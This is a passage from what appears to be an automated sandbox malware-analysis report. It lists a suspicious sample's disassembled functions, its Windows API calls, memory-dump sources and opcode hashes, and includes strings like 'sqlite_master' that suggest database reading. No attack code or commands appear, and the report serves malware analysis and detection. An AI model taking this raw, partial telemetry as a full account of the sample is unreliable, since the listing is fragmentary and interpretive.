                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                            • memset.MSVCRT ref: 0042FED3
                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: sqlite_master
                                                            • API String ID: 438689982-3163232059
                                                            • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                            • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                            Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                            • String ID:
                                                            • API String ID: 3917621476-0
                                                            • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                            • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                            Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                            • wcscat.MSVCRT ref: 0041101F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                            • String ID:
                                                            • API String ID: 822687973-0
                                                            • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                            • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                            Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75D4DF80,?,0041755F,?), ref: 00417452
                                                            • malloc.MSVCRT ref: 00417459
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75D4DF80,?,0041755F,?), ref: 00417478
                                                            • free.MSVCRT ref: 0041747F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$freemalloc
                                                            • String ID:
                                                            • API String ID: 2605342592-0
                                                            • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                            • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                            Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                            • RegisterClassW.USER32(00000001), ref: 00412428
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                            • String ID:
                                                            • API String ID: 2678498856-0
                                                            • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                            • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                            Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item
                                                            • String ID:
                                                            • API String ID: 3888421826-0
                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                            Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00417B7B
                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                            • String ID:
                                                            • API String ID: 3727323765-0
                                                            • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                            • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                            Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F673
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                            • strlen.MSVCRT ref: 0040F6A2
                                                            • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                            • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                            Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F6E2
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                            • strlen.MSVCRT ref: 0040F70D
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                            • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                            Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00402FD7
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                            • strlen.MSVCRT ref: 00403006
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                            • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                            Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                            • String ID:
                                                            • API String ID: 764393265-0
                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                            Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Time$System$File$LocalSpecific
                                                            • String ID:
                                                            • API String ID: 979780441-0
                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                            Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$DialogHandleModuleParam
                                                            • String ID:
                                                            • API String ID: 1386444988-0
                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                            Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: InvalidateMessageRectSend
                                                            • String ID: d=E
                                                            • API String ID: 909852535-3703654223
                                                            • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                            • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                            Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcschr.MSVCRT ref: 0040F79E
                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcschr$memcpywcslen
                                                            • String ID: "
                                                            • API String ID: 1983396471-123907689
                                                            • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                            • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                            Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer_memicmpmemcpy
                                                            • String ID: URL
                                                            • API String ID: 2108176848-3574463123
                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                            Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfmemcpy
                                                            • String ID: %2.2X
                                                            • API String ID: 2789212964-323797159
                                                            • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                            • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                            Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf
                                                            • String ID: %%-%d.%ds
                                                            • API String ID: 3988819677-2008345750
                                                            • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                            • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                            Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                            • memset.MSVCRT ref: 00401917
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PlacementWindowmemset
                                                            • String ID: WinPos
                                                            • API String ID: 4036792311-2823255486
                                                            • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
